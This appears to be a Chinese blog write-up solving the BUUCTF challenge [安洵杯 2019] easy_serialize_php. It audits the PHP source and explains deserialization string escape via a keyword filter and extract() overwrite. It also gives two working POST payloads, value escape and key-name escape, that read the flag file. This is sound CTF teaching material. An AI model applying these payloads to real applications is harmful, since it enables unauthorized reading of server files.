[安洵杯 2019]easy_serialize_php 1

最新推荐文章于 2023-12-14 11:17:16 发布
最新推荐文章于 2023-12-14 11:17:16 发布
阅读量2.9k 收藏 6
点赞数 6
分类专栏: buuctf 文章标签: php 开发语言 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62879498/article/details/124644325
版权

[安洵杯 2019]easy_serialize_php 1

进入环境,我们首先查看 index.php 源码
在这里插入图片描述
代码审计:


$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}

if($_SESSION){
    unset($_SESSION);
}

mplode() 函数返回一个由数组元素组合成的字符串
preg_replace 函数执行一个正则表达式的搜索和替换。
将敏感字符(‘php’,‘flag’,‘php5’,‘php4’,‘fl1g’)替换成 空格

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

extract() 函数从数组中将变量导入到当前的符号表(本题的作用是将_SESSION的两个函数变为post传参)
function的value是由$_GET['f']传进来的
当以get方法传入img_path的情况下,$_SESSION['img']为传入的img_path进行base64加密和sha1加密

sha1 密码散列函数

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

$_SESSION进行系列化
$function的值进行判断,进而显示不同的页面
当function的值等于show_image的时候 将_SESSION序列化且过滤,将值赋给$serialize_info,然后将值赋给$userinfo['img']指向的文件(base64解密后)最后将会高亮userinfo

在这里题目给了我们提示

 eval('phpinfo();'); //maybe you can find something in here!

访问:
在这里插入图片描述
得到了flag文件的名字。

解题方法

上文代码中有一个输出的内容,是我们可控的部分,我们可以通过改变img_path的内容或者直接改变userinfo[‘img’]的内容来达到 读取flag的目的

先了解下反序列化逃逸的原理
在构造键值的时候被过滤掉了,但序列化后的字符串记录的长度不会因为过滤而改变,所以就会把序列化后的字符串的结构当做值的内容给读取。
如果我们自己构造出反序列化字符串的结构,并因为过滤破坏掉原来的结构,就可以构造出恶意代码。

直接改userinfo[‘img’]
反序列化字符逃逸的两种方法:键值逃逸,键名逃逸
键值逃逸

payload

_SESSION[user]=flagflagflagflagflagphp&_SESSION[function]=";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:1:"1";s:1:"2";}

flag和php是敏感字符,在使用的时候被过滤掉了,但序列化记录的字符串长度没有过滤掉,所以在序列化的时候
s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:1:"2";}被当作了原来的value
echo file_get_contents(base64_decode($userinfo['img']));实现了读取flag的,目的
实现了逃逸
在这里插入图片描述
将/d0g3_fllllllag进行base64编码后上传,可获得 flag

在这里插入图片描述

键名逃逸
原理相同,不过这个方法变成了过滤键名
payload:

_SESSION[flagphp]=;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

过滤前
a:2:{s:7:"phpflag";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
过滤后
a:2:{s:7:"";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
下面的步骤和值替换一样
这里的键名变为";s:48: 实现了逃逸

在这里插入图片描述

参考文章

hcjtn
关注
  • 6
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
grpc_serialize_example
02-14
grpc_serialize_example ex) protoc -I . proto/metric.proto --python_out=. ex) protoc -I . proto/metric.proto --go_out=.
ts_serialize:零依赖库,用于序列化数据
05-19
:bowl_with_spoon: ts_serialize 零依赖库,用于序列化数据。 ts_serialize可以帮助您: 将camelCase类成员转换为snake_case JSON属性以与REST API一起使用 从REST API有效负载中排除内部字段 将数据类型转换为内部格式,例如: Date的 支持的序列化类型 建于 天野 :sauropod: 贡献 我们提供了资源来帮助您请求新功能或报告并修复错误。 CONTRIBUTING.md-有关请求功能或报告错误或打开请求请求的指导原则 DEVELOPMENT.md-有关设置环境和运行测试套件的说明 CODE_OF_CONDUCT.md-用于社区准则 版本控制 我们使用SemVer进行版本控制。 作者 斯科特·哈迪( Scott Hardy) -初始工作- @shardyMBAI :frog: Chris Dufour-初始工作- @ChrisDufourMB :pizza: :cat_face:
se_mouz_image.rar_serialize_序列化
09-23
实现利用serialize()函数序列化文档和鼠标画一些简单的图形的功能.
mfc_Serialize.zip_CplusSerializeM_MFC Serialize socket_MFC seria
09-19
使用 MFC 串行化数据和 C++ 对象,三个简单的例子程序
PHP中json_encode、json_decode与serialize、unserialize的性能测试分析
10-29
今天偶然在想,如果用PHP写一个类似BDB的基于文件的Key-Value小型数据库用于存储非结构化的记录型数据,不知道效率会如何?
BUUCTF [安洵 2019]easy_serialize_php 1 详细讲解
qq_56313338的博客
08-12 416
题目来自buuctf,这是一题关于php序列化逃逸的题。
[安洵 2019]easy_serialize_php
最新发布
Lyh0558的博客
12-14 179
考点:预包含,反序列化字符串逃逸,extract变量覆盖漏洞。
[安洵 2019]easy_serialize_php1--writeup
m0_65080524的博客
08-17 104
,我们要想办法让红色的这段去代替原本“$_SESSION['img'] = base64_encode('guest_img.png');s:20:"Z3Vlc3RfaW1nLnBuZw==" ,所以就要GET传值将其赋给$_SESSION['function'],提前闭合使后面原本的$_SESSION['img']无效。因为extract($_POST)在赋值的后面,也就是说这两个值($_SESSION["user"],$_SESSION["user"])是可以控制的,也就是可以给它们重新赋值。
[2019]easy_serialize_php 1
qq_53460654的博客
09-28 1281
打开环境得到源码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){ unset($_SESSIO
buuctf[安洵 2019]easy_serialize_php
2202_75317918的博客
03-30 411
buuctf[安洵 2019]easy_serialize_php
BUUCTF:[安洵 2019]easy_serialize_php
末初的CSDN博客
03-03 921
https://buuoj.cn/challenges#[%E5%AE%89%E6%B4%B5%E6%9D%AF%202019]easy_serialize_php 访问/index.php?f=highlight_file得到源码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'
easy_serialize_php(反序列化字符逃逸)
weixin_45007073的博客
03-16 1009
前言 今天突然想起来代码审计好像很久没搞了,在网上找到了个2019安洵的题目。题目的考点是反序列化字符逃逸,通过字符的逃逸我们才能拿到对应的flag值。 反序列化原理 我们要了解反序列化字符逃逸的原理,首先就要先了解反序列化的原理,我们先举个简单的例子帮助理解和分析。 <?php $img["one"] = "flag"; $img["two"] = "test"; $a = serialize($img); var_dump($a); $b = unserialize($a); va
[安洵 2019]easy_serialize_php(有思考过程)
v2ish1yan的博客
04-20 3017
[安洵 2019]easy_serialize_php 反序列化

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值